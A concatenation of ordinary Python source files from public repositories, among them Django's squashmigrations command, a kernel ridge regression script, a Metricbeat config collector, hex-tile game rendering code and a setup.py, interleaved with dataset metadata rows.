neighbours.append(neighbour)
return neighbours
def _build_paths(self):
"""Calculate paths from each tile to the base."""
# Clear any previous path info
for _, tile in numpy.ndenumerate(self.tiles):
if tile:
tile.path_next = None
# TODO: Start a 0,0 for now, but eventually will have to work out where
# the base is and start there.
start = self.lookup_tile(vector.Vector(0, 0))
if not start:
return
# TODO: consider height
frontier = deque([start])
visited = set([start])
while len(frontier) > 0:
tile = frontier.popleft()
for nxt in [t for t in self.tile_neighbours(tile)
if t.empty and t not in visited]:
frontier.append(nxt)
visited.add(nxt)
nxt.path_next = tile
def _build_vertex_arrays(self):
# TODO: Could make data smaller with indirect buffers
all_verts = []
for tile in self.iter_tiles():
for s in range(tile.height):
face_top_verts, face_vert_verts = ([], [])
line_top_verts, line_vert_verts = ([], [])
for i in range(6):
angle = 2 * math.pi / 6
z = 0 + Tile.DEPTH * s
px = tile.x + Tile.SIZE * math.sin(angle * (5 - i))
py = tile.y + Tile.SIZE * math.cos(angle * (5 - i))
face_top_verts.extend([px, py, z + Tile.DEPTH,
tile.face_colour.r,
tile.face_colour.g,
tile.face_colour.b,
tile.face_colour.a])
line_top_verts.extend([px, py, z + Tile.DEPTH,
tile.outline_colour.r,
tile.outline_colour.g,
tile.outline_colour.b,
tile.outline_colour.a])
px = tile.x + Tile.SIZE * math.sin(angle * i)
py = tile.y + Tile.SIZE * math.cos(angle * i)
face_vert_verts.extend([px, py, z,
tile.face_colour.r,
tile.face_colour.g,
tile.face_colour.b,
tile.face_colour.a,
px, py, z + Tile.DEPTH,
tile.face_colour.r,
tile.face_colour.g,
tile.face_colour.b,
tile.face_colour.a])
line_vert_verts.extend([px, py, z,
tile.face_colour.r,
tile.face_colour.g,
tile.face_colour.b,
tile.face_colour.a,
px, py, z + Tile.DEPTH,
tile.face_colour.r,
tile.face_colour.g,
tile.face_colour.b,
tile.face_colour.a])
all_verts.extend(face_top_verts + face_vert_verts +
line_top_verts + line_vert_verts)
verts = numpy.array(all_verts, numpy.float32)
self._vao = glutils.VertexArray()
self._vbo = glutils.VertexBuffer()
with self._vao.bind():
self._vbo.bind()
GL.glBufferData(GL.GL_ARRAY_BUFFER, verts.nbytes, verts,
GL.GL_STATIC_DRAW)
GL.glEnableVertexAttribArray(0)
GL.glVertexAttribPointer(0, 3, GL.GL_FLOAT, GL.GL_FALSE, 7 * 4,
None)
GL.glEnableVertexAttribArray(1)
GL.glVertexAttribPointer(1, 4, GL.GL_FLOAT, GL.GL_FALSE, 7 * 4,
ctypes.c_void_p(12))
def _draw_vertex_arrays(self):
with self._vao.bind(), self._shader.use():
tile_count = len([t for t in self.iter_tiles()])
for i in range(tile_count):
GL.glDrawArrays(GL.GL_TRIANGLE_FAN, i * 36, 6)
GL.glDrawArrays(GL.GL_TRIANGLE_STRIP, 6 + i * 36, 12)
with glutils.linewidth(2):
GL.glDrawArrays(GL.GL_LINE_LOOP, 18 + i * 36, 6)
GL.glDrawArrays(GL.GL_LINES, 24 + i * 36, 12)
def _update_target(self, c):
"""Check whether we have a target, and find a new one if not."""
if not self._target or not self._target():
targets = [enemy for enemy in self.enemies
if enemy.phrase.start == c]
if targets:
self._target = weakref.ref(targets[0])
| 37.346939 | 80 | 0.514754 |
48c876e724d77ac50edfd30e7c7037d74c99f265 | 8,767 | py | Python | python3.4Smartforest/lib/python3.4/site-packages/django/core/management/commands/squashmigrations.py | letouriste001/SmartForest_2.0 | 109b78bf1e8c8404800f377ab969395ccbb617be | [
"MIT"
] | null | null | null | python3.4Smartforest/lib/python3.4/site-packages/django/core/management/commands/squashmigrations.py | letouriste001/SmartForest_2.0 | 109b78bf1e8c8404800f377ab969395ccbb617be | [
"MIT"
] | null | null | null | python3.4Smartforest/lib/python3.4/site-packages/django/core/management/commands/squashmigrations.py | letouriste001/SmartForest_2.0 | 109b78bf1e8c8404800f377ab969395ccbb617be | [
"MIT"
] | null | null | null | from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from django.db import DEFAULT_DB_ALIAS, connections, migrations
from django.db.migrations.loader import AmbiguityError, MigrationLoader
from django.db.migrations.migration import SwappableTuple
from django.db.migrations.optimizer import MigrationOptimizer
from django.db.migrations.writer import MigrationWriter
from django.utils import six
from django.utils.version import get_docs_version
class Command(BaseCommand):
help = "Squashes an existing set of migrations (from first until specified) into a single new one."
def add_arguments(self, parser):
parser.add_argument('app_label',
help='App label of the application to squash migrations for.')
parser.add_argument('start_migration_name', default=None, nargs='?',
help='Migrations will be squashed starting from and including this migration.')
parser.add_argument('migration_name',
help='Migrations will be squashed until and including this migration.')
parser.add_argument('--no-optimize', action='store_true', dest='no_optimize', default=False,
help='Do not try to optimize the squashed operations.')
parser.add_argument('--noinput', '--no-input',
action='store_false', dest='interactive', default=True,
help='Tells Django to NOT prompt the user for input of any kind.')
def handle(self, **options):
self.verbosity = options.get('verbosity')
self.interactive = options.get('interactive')
app_label = options['app_label']
start_migration_name = options['start_migration_name']
migration_name = options['migration_name']
no_optimize = options['no_optimize']
# Load the current graph state, check the app and migration they asked for exists
loader = MigrationLoader(connections[DEFAULT_DB_ALIAS])
if app_label not in loader.migrated_apps:
raise CommandError(
"App '%s' does not have migrations (so squashmigrations on "
"it makes no sense)" % app_label
)
migration = self.find_migration(loader, app_label, migration_name)
# Work out the list of predecessor migrations
migrations_to_squash = [
loader.get_migration(al, mn)
for al, mn in loader.graph.forwards_plan((migration.app_label, migration.name))
if al == migration.app_label
]
if start_migration_name:
start_migration = self.find_migration(loader, app_label, start_migration_name)
start = loader.get_migration(start_migration.app_label, start_migration.name)
try:
start_index = migrations_to_squash.index(start)
migrations_to_squash = migrations_to_squash[start_index:]
except ValueError:
raise CommandError(
"The migration '%s' cannot be found. Maybe it comes after "
"the migration '%s'?\n"
"Have a look at:\n"
" python manage.py showmigrations %s\n"
"to debug this issue." % (start_migration, migration, app_label)
)
# Tell them what we're doing and optionally ask if we should proceed
if self.verbosity > 0 or self.interactive:
self.stdout.write(self.style.MIGRATE_HEADING("Will squash the following migrations:"))
for migration in migrations_to_squash:
self.stdout.write(" - %s" % migration.name)
if self.interactive:
answer = None
while not answer or answer not in "yn":
answer = six.moves.input("Do you wish to proceed? [yN] ")
if not answer:
answer = "n"
break
else:
answer = answer[0].lower()
if answer != "y":
return
# Load the operations from all those migrations and concat together,
# along with collecting external dependencies and detecting
# double-squashing
operations = []
dependencies = set()
# We need to take all dependencies from the first migration in the list
# as it may be 0002 depending on 0001
first_migration = True
for smigration in migrations_to_squash:
if smigration.replaces:
raise CommandError(
"You cannot squash squashed migrations! Please transition "
"it to a normal migration first: "
"https://docs.djangoproject.com/en/%s/topics/migrations/#squashing-migrations" % get_docs_version()
)
operations.extend(smigration.operations)
for dependency in smigration.dependencies:
if isinstance(dependency, SwappableTuple):
if settings.AUTH_USER_MODEL == dependency.setting:
dependencies.add(("__setting__", "AUTH_USER_MODEL"))
else:
dependencies.add(dependency)
elif dependency[0] != smigration.app_label or first_migration:
dependencies.add(dependency)
first_migration = False
if no_optimize:
if self.verbosity > 0:
self.stdout.write(self.style.MIGRATE_HEADING("(Skipping optimization.)"))
new_operations = operations
else:
if self.verbosity > 0:
self.stdout.write(self.style.MIGRATE_HEADING("Optimizing..."))
optimizer = MigrationOptimizer()
new_operations = optimizer.optimize(operations, migration.app_label)
if self.verbosity > 0:
if len(new_operations) == len(operations):
self.stdout.write(" No optimizations possible.")
else:
self.stdout.write(
" Optimized from %s operations to %s operations." %
(len(operations), len(new_operations))
)
# Work out the value of replaces (any squashed ones we're re-squashing)
# need to feed their replaces into ours
replaces = []
for migration in migrations_to_squash:
if migration.replaces:
replaces.extend(migration.replaces)
else:
replaces.append((migration.app_label, migration.name))
# Make a new migration with those operations
subclass = type("Migration", (migrations.Migration, ), {
"dependencies": dependencies,
"operations": new_operations,
"replaces": replaces,
})
if start_migration_name:
new_migration = subclass("%s_squashed_%s" % (start_migration.name, migration.name), app_label)
else:
new_migration = subclass("0001_squashed_%s" % migration.name, app_label)
new_migration.initial = True
# Write out the new migration file
writer = MigrationWriter(new_migration)
with open(writer.path, "wb") as fh:
fh.write(writer.as_string())
if self.verbosity > 0:
self.stdout.write(self.style.MIGRATE_HEADING("Created new squashed migration %s" % writer.path))
self.stdout.write(" You should commit this migration but leave the old ones in place;")
self.stdout.write(" the new migration will be used for new installs. Once you are sure")
self.stdout.write(" all instances of the codebase have applied the migrations you squashed,")
self.stdout.write(" you can delete them.")
if writer.needs_manual_porting:
self.stdout.write(self.style.MIGRATE_HEADING("Manual porting required"))
self.stdout.write(" Your migrations contained functions that must be manually copied over,")
self.stdout.write(" as we could not safely copy their implementation.")
self.stdout.write(" See the comment at the top of the squashed migration for details.")
def find_migration(self, loader, app_label, name):
try:
return loader.get_migration_by_prefix(app_label, name)
except AmbiguityError:
raise CommandError(
"More than one migration matches '%s' in app '%s'. Please be "
"more specific." % (name, app_label)
)
except KeyError:
raise CommandError(
"Cannot find a migration matching '%s' from app '%s'." %
(name, app_label)
)
| 8,767 | 8,767 | 0.610243 |
8faad1c0f417eab3396b362bcc477d27aecd7393 | 13,717 | py | Python | tools/krr-Cortes.py | cosmo-epfl/glosim | 930998b7249adc0ac3e48308314233341de6e73f | [
"MIT"
] | 24 | 2017-04-19T14:23:53.000Z | 2021-12-23T13:37:23.000Z | tools/krr-Cortes.py | lab-cosmo/glosim | 930998b7249adc0ac3e48308314233341de6e73f | [
"MIT"
] | 9 | 2017-05-23T10:30:08.000Z | 2019-02-05T06:43:04.000Z | tools/krr-Cortes.py | lab-cosmo/glosim | 930998b7249adc0ac3e48308314233341de6e73f | [
"MIT"
] | 11 | 2017-05-01T14:37:40.000Z | 2021-12-23T14:00:12.000Z | #!/usr/bin/env python
# compute kernel ridge regression for a data set given a kernel matrix
# and a vector of the observed properties. syntax:
# $ krr.py <kernel.dat> <properties.dat> [ options ]
import argparse
import numpy as np
import sys
import MultipleKernelLearning as mkl
import costs as cst
from select_landmarks import farthestPointSampling,randomsubset,cur,segfind
def main(kernelFilenames, propFilename, mode, trainfrac, csi, ntests, ttest, savevector="", refindex="",**KRRCortesParam):
trainfrac=float(trainfrac)
#csi = float(csi)
ntests = int(ntests)
ttest=float(ttest)
if (mode == "sequential" or mode == "all") and ntests>1:
raise ValueError("No point in having multiple tests when using determininstic train set selection")
# Reads kernels
nbOfKernels = len(kernelFilenames)
kernels = []
for it,kernelFilename in enumerate(kernelFilenames):
kernels.append(np.loadtxt(kernelFilename, dtype=np.float64, comments='#', delimiter=None, converters=None, skiprows=0, usecols=None, unpack=False, ndmin=0))
# heuristics to see if this is a kernel or a similarity matrix!!
if kernels[it][0,0]<1e-8:
kernels[it] = (1-0.5*kernels[it]*kernels[it])
# first hyperparameter - we raise the kernel to a positive exponent to make it sharper or smoother
kernels[it] = kernels[it]**csi[it]
# reads properties
prop = np.loadtxt(propFilename, dtype=np.float64, comments='#', delimiter=None, converters=None, skiprows=0, usecols=None, unpack=False, ndmin=0)
# check if size of input of the kernels and property is consistant
for it,kernel in enumerate(kernels):
if len(prop) != len(kernel):
raise ValueError("Dimention mismatch between kernel {} and prop".format(kernelFilenames[it]))
for it,kernel1 in enumerate(kernels):
for jt,kernel2 in enumerate(kernels):
if kernel1.shape != kernel2.shape:
raise ValueError("Dimention mismatch between kernel {} and kernel {}".format(kernelFilenames[it]),kernelFilenames[jt])
# Kernel matrices should be square and of the same size
nel = len(kernels[0])
# reads index, if available
if refindex == "":
rlabs = np.asarray(range(nel), int)
else:
rlabs = np.loadtxt(refindex,dtype=int)
if len(rlabs) != nel:
raise ValueError("Reference index size mismatch")
# chooses test
testmae=0
trainmae=0
truemae=0
testrms=0
trainrms=0
truerms=0
testsup=0
trainsup=0
truesup=0
ctrain=0
ctest=0
ctrue=0
if mode=="manual":
mtrain = np.loadtxt("train.idx")
if mode == "all" :
raise NotImplementedError("")
# tp = p[:]
# tk = kij[:][:].copy()
# vp = np.var(tp) # variance of the property subset (to be size consistent!)
# vk = np.trace(tk)/len(tp)
# print >> sys.stderr, "Regularization shift ", sigma**2 * vk/vp
# #print lweight
# for i in xrange(len(tp)):
# tk[i,i]+=sigma**2 * vk/vp #/ lweight[i] # diagonal regularization times weight!
# tc = np.linalg.solve(tk, tp)
# krp = np.dot(kij[:,:],tc)
# mae=abs(krp[:]-p[:]).sum()/len(p)
# rms=np.sqrt(((krp[:]-p[:])**2).sum()/len(p))
# sup=abs(krp[:]-p[:]).max()
# print "# train-set MAE: %f RMS: %f SUP: %f" % (mae, rms, sup)
# ltrain = range(nel)
else:
np.set_printoptions(threshold=10000)
ntrain = int(trainfrac*nel)
if mode == "manual": ntrain=len(mtrain)
ntrue = int(ttest*nel)
seeds = np.random.randint(0,5000,ntests)
alphas = []
mus = []
testMAEs = []
ltrains = []
rlabss = []
for itest in xrange(ntests):
ltest = np.zeros(nel-ntrain-ntrue,int)
ltrain = np.zeros(ntrain,int)
# if specified, select some elements that are completely ignored from both selection and training
ltrue = np.zeros(ntrue, int)
psel = np.ones(nel,float)
if ntrue > 0:
ltrue = randomsubset(nel, ntrue)
psel[ltrue] = 0.0
if mode == "random":
ltrain[:] = randomsubset(nel, ntrain, psel)
elif mode == "manual":
ltrain[:] = mtrain
elif mode == "sequential":
ltrain[:] = range(ntrain)
elif mode == "fps":
# do farthest point sampling on the uniform combination of the kernels
kij = np.zeros((nel,nel),dtype=np.float64)
for kernel in kernels:
kij += kernel
isel=int(np.random.uniform()*nel)
while isel in ltrue:
isel=int(np.random.uniform()*nel)
ltrain = farthestPointSampling(kij,nel,ntrain,initalLandmark=isel,listOfDiscardedPoints=ltrue,seed=seeds[itest])
k = 0
for i in xrange(nel):
if not i in ltrain and not i in ltrue:
ltest[k] = i
k += 1
# # the kernel should represent the variance of the energy (in a GAP interpretation)
# # and sigma^2 the estimate of the noise variance. However we want to keep a "naked kernel" so
# # we can then estimate without bringing around the variance. So the problem would be
# # (vp*N/Tr(tk) tk + sigma^2 I )^-1 p = w
# # but equivalently we can write
# # ( tk + sigma^2 *tr(tk)/(N vp) I )^-1 p = w
# get prop of reference for training and testing
propTeRef = prop[ltest]
propTrRef = prop[ltrain]
# Train your model and get the optimal weights out
kernelsTr = []
for it,kernel in enumerate(kernels):
kernelsTr.append(kernel[np.ix_(ltrain,ltrain)])
alpha, mu, propTr = mkl.TrainKRRCortes(kernelsTr,propTrRef,**KRRCortesParam)
# Predict property using the optimal weights
kernelsTe = []
for it,kernel in enumerate(kernels):
kernelsTe.append(kernel[np.ix_(ltrain,ltest)])
propTe = mkl.PredictKRRCortes(kernelsTe,alpha,mu)
mae = cst.mae(propTe-propTeRef)
rms = cst.rmse(propTe-propTeRef)
sup = cst.sup_e(propTe-propTeRef)
print "# run: {} test-set MAE: {:.4e} RMS: {:.4e} SUP: {:.4e}".format(itest, mae, rms, sup)
# accumulate output to select the weigths corresponding to the lowest MAE
alphas.append(alpha)
mus.append(mu)
testMAEs.append(mae)
ltrains.append(ltrain)
rlabss.append(rlabs)
testmae += cst.mae(propTe-propTeRef)
trainmae += cst.mae(propTr-propTrRef)
#if ntrue>0: truemae += abs(krp[ltrue]-prop[ltrue]).sum()/len(ltrue)
testrms += cst.rmse(propTe-propTeRef)
trainrms += cst.rmse(propTr-propTrRef)
#if ntrue>0: truerms += np.sqrt(((krp[ltrue]-prop[ltrue])**2).sum()/len(ltrue))
testsup += cst.sup_e(propTe-propTeRef)
trainsup += cst.sup_e(propTr-propTrRef)
#if ntrue>0: truesup+=abs(krp[ltrue]-prop[ltrue]).max()
ctrain+=len(ltrain)
ctest+=len(ltest)
ctrue+=len(ltrue)
# for it,jt in enumerate(ltrain):
# print jt, propTrRef[it], propTr[it], "TRAIN"
# for it,jt in enumerate(ltest):
# print jt, propTeRef[it], propTe[it], "TEST"
# print alpha
print 'Mu = {}'.format(mu)
print "# KRR results ({:d} tests, {:f} training p., {:f} test p.): csi={} sigma={:.2e} mu0={} Lambda={:.1f} epsilon={:.1e} eta={:.1e} "\
.format(ntests, ctrain/ntests, ctest/ntests, csi, KRRCortesParam['sigma'],KRRCortesParam['mu0'],KRRCortesParam['Lambda'],KRRCortesParam['epsilon'],KRRCortesParam['eta'])
print "# Train points averages: MAE={:.4e} RMSE={:.4e} SUP={:.4e}".format(trainmae/ntests, trainrms/ntests, trainsup/ntests)
print "# Test points averages: MAE={:.4e} RMSE={:.4e} SUP={:.4e} ".format(testmae/ntests, testrms/ntests, testsup/ntests)
if len(ltrue) > 0:
print "# True test points MAE=%f RMSE=%f SUP=%f " % (truemae/ntests, truerms/ntests, truesup/ntests)
if savevector:
bestRunIdx = np.argmin(testMAEs)
falpha = open(savevector+'.alpha','w')
fmu = open(savevector+'.mu','w')
kernelFilenamesStr = '';
for it,kernelFilename in enumerate(kernelFilenames):
kernelFilenamesStr+=kernelFilename+' '
commentline=' Train Vector from kernel matrix with the best MAE test score ('+str(np.min(testMAEs))+'): '+ kernelFilenamesStr +', and properties from '+ propFilename + ' selection mode: '+mode+' : Csi, sigma, mu0, Lambda, epsilon, eta = ' + str(csi) +' , '+ str(KRRCortesParam['sigma']) \
+' , '+ str(mu0)+' , '+ str(KRRCortesParam['Lambda'])+' , '+ str(KRRCortesParam['epsilon'])+' , '+ str(KRRCortesParam['eta'])
np.savetxt(falpha,np.asarray([alphas[bestRunIdx], ltrains[bestRunIdx], rlabss[bestRunIdx][ltrains[bestRunIdx]]]).T,fmt=("%24.15e", "%10d", "%10d"),header=commentline)
np.savetxt(fmu,mus[bestRunIdx],fmt=("%24.15e"),header=commentline)
# commentline=' Train Vector from kernel matrix with the best MAE test score ('+str(testMAEs[-1])+'): '+ kernelFilenamesStr +', and properties from '+ propFilename + ' selection mode: '+mode+' : Csi, sigma, mu0, Lambda, epsilon, eta = ' + str(csi) +' , '+ str(KRRCortesParam['sigma']) \
# +' , '+ str(mu0)+' , '+ str(KRRCortesParam['Lambda'])+' , '+ str(KRRCortesParam['epsilon'])+' , '+ str(KRRCortesParam['eta'])
# np.savetxt(falpha,np.asarray([alpha, ltrain, rlabs[ltrain]]).T,fmt=("%24.15e", "%10d", "%10d"),header=commentline)
# np.savetxt(fmu,mu,fmt=("%24.15e"),header=commentline)
falpha.close()
fmu.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="""Computes Multiple Kernel Learning KRR from Cortes and analytics based on a kernel matrix and a property vector.""")
parser.add_argument("kernels", nargs=1, help="Kernel matrices. List of coma separated file names.")
parser.add_argument("props", nargs=1, help="Property file name.")
parser.add_argument("--mode", type=str, default="random", help="Train point selection (e.g. --mode all / sequential / random / fps / cur / manual")
parser.add_argument("-f", type=float, default='0.5', help="Train fraction")
parser.add_argument("--truetest", type=float, default='0.0', help="Take these points out from the selection procedure")
parser.add_argument("--csi", type=str, default='', help="Kernel scaling. list of coma separated positive values (e.g. 1,1,1 )")
parser.add_argument("--sigma", type=float, default='1e-3', help="KRR regularization. In units of the properties. ")
parser.add_argument("--epsilon", type=float, default='2e-3', help="KRR-Mkl param. convergence tolerance on alpha weights absolute difference.")
parser.add_argument("--Lambda", type=float, default='1', help="KRR-Mkl param. Radius of the ball containing the possible weights of the kernel combination, positive value")
parser.add_argument("--mu0", type=str, default='', help="KRR-Mkl param. Center of the ball containing the possible weights of the kernel combination, list of coma separated positive values (e.g. 1,1,1 )")
parser.add_argument("--maxIter", type=float, default='1e2', help="KRR-Mkl param. Maximal number of iteration. ")
parser.add_argument("--eta", type=float, default='0.5', help="KRR-Mkl param. Interpolation parameter for the update of alpha, belongs to ]0,1[. ")
parser.add_argument("--ntests", type=int, default='1', help="Number of tests")
parser.add_argument("--refindex", type=str, default="", help="Structure indices of the kernel matrix (useful when dealing with a subset of a larger structures file)")
parser.add_argument("--saveweights", type=str, default="", help="Save the train-set weights vector in file")
args = parser.parse_args()
kernelFilenames = args.kernels[0].split(',')
a = args.mu0.split(',')
if len(a) != len(kernelFilenames):
raise ValueError("The number of kernel file names and elements of mu0 must be equal.")
mu0 = np.zeros(len(a),dtype=np.float64)
for it,item in enumerate(a):
mu0[it] = float(item)
a = args.csi.split(',')
if len(a) != len(kernelFilenames):
raise ValueError("The number of kernel file names and elements of csi must be equal.")
csi = np.zeros(len(a),dtype=np.float64)
for it,item in enumerate(a):
csi[it] = float(item)
KRRCortesParam = {'mu0':mu0,'epsilon':args.epsilon,'Lambda':args.Lambda,'eta':args.eta,
'maxIter':args.maxIter,'sigma':args.sigma}
main(kernelFilenames=kernelFilenames, propFilename=args.props[0], mode=args.mode,
trainfrac=args.f, csi=csi, ntests=args.ntests, refindex=args.refindex,
ttest=args.truetest,savevector=args.saveweights, **KRRCortesParam)
| 49.88 | 296 | 0.594007 |
9980b4d38a3ae528fc3bf8e52c015fd5e81cec7d | 2,661 | py | Python | vendor/github.com/elastic/beats/metricbeat/scripts/config_collector.py | PPACI/krakenbeat | e75ec8f006164acb8a57d0c9609bebe534955813 | [
"Apache-2.0"
] | 3 | 2018-01-04T19:15:26.000Z | 2020-02-20T03:35:27.000Z | vendor/github.com/elastic/beats/metricbeat/scripts/config_collector.py | PPACI/krakenbeat | e75ec8f006164acb8a57d0c9609bebe534955813 | [
"Apache-2.0"
] | null | null | null | vendor/github.com/elastic/beats/metricbeat/scripts/config_collector.py | PPACI/krakenbeat | e75ec8f006164acb8a57d0c9609bebe534955813 | [
"Apache-2.0"
] | 1 | 2020-10-11T14:57:48.000Z | 2020-10-11T14:57:48.000Z | import os
import argparse
import yaml
# Collects config for all modules
def collect(beat_name, beat_path, full=False):
base_dir = beat_path + "/module"
path = os.path.abspath(base_dir)
# yml file
config_yml = "\n#========================== Modules configuration ============================\n"
config_yml += beat_name + """.modules:
"""
# Read the modules list but put "system" first
modules = ["system"]
for module in sorted(os.listdir(base_dir)):
if module != "system":
modules.append(module)
# Iterate over all modules
for module in modules:
beat_path = path + "/" + module + "/_meta"
module_configs = beat_path + "/config.yml"
# By default, short config is read if short is set
short_config = True
# Check if full config exists
if full:
full_module_config = beat_path + "/config.full.yml"
if os.path.isfile(full_module_config):
module_configs = full_module_config
# Only check folders where config exists
if not os.path.isfile(module_configs):
continue
# Load title from fields.yml
with open(beat_path + "/fields.yml") as f:
fields = yaml.load(f.read())
title = fields[0]["title"]
# Check if short config was disabled in fields.yml
if not full and "short_config" in fields[0]:
short_config = fields[0]["short_config"]
if not full and short_config is False:
continue
config_yml += get_title_line(title)
# Load module yaml
with file(module_configs) as f:
for line in f:
config_yml += line
config_yml += "\n"
# output string so it can be concatenated
print(config_yml)
# Makes sure every title line is 79 + newline chars long
def get_title_line(title):
dashes = (79 - 10 - len(title)) / 2
line = "#"
line += "-" * dashes
line += " " + title + " Module "
line += "-" * dashes
return line[0:78] + "\n"
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Collects modules config")
parser.add_argument("path", help="Path to the beat folder")
parser.add_argument("--beat", help="Beat name")
parser.add_argument("--full", action="store_true",
help="Collect the full versions")
args = parser.parse_args()
beat_name = args.beat
beat_path = args.path
collect(beat_name, beat_path, args.full)
| 28.010526 | 103 | 0.565201 |
e1308e34f20c16ef49a124a89d7c6e894d69501e | 803 | py | Python | setup.py | zekearneodo/ceciestunepipe | 7e771783769816f37de44077177152175aecc2b7 | [
"MIT"
] | null | null | null | setup.py | zekearneodo/ceciestunepipe | 7e771783769816f37de44077177152175aecc2b7 | [
"MIT"
] | null | null | null | setup.py | zekearneodo/ceciestunepipe | 7e771783769816f37de44077177152175aecc2b7 | [
"MIT"
] | null | null | null | from setuptools import setup
setup(name='ceciestunepipe',
version='0.1',
description='Spike sorting pipeline based on spikeinterface for spikeglx and openephys',
url='http://github.com/zekearneodo/ceciestunepipe',
author='Zeke Arneodo',
author_email='ezequiel@ini.ethz.ch',
license='MIT',
packages=['ceciestunepipe'],
install_requires=['numpy',
'matplotlib',
'pandas>=0.23',
'more_itertools',
'peakutils>=1.3',
'librosa',
'seaborn',
'scipy',
'tqdm',
'h5py',
'parse'
],
zip_safe=False)
| 33.458333 | 94 | 0.449564 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.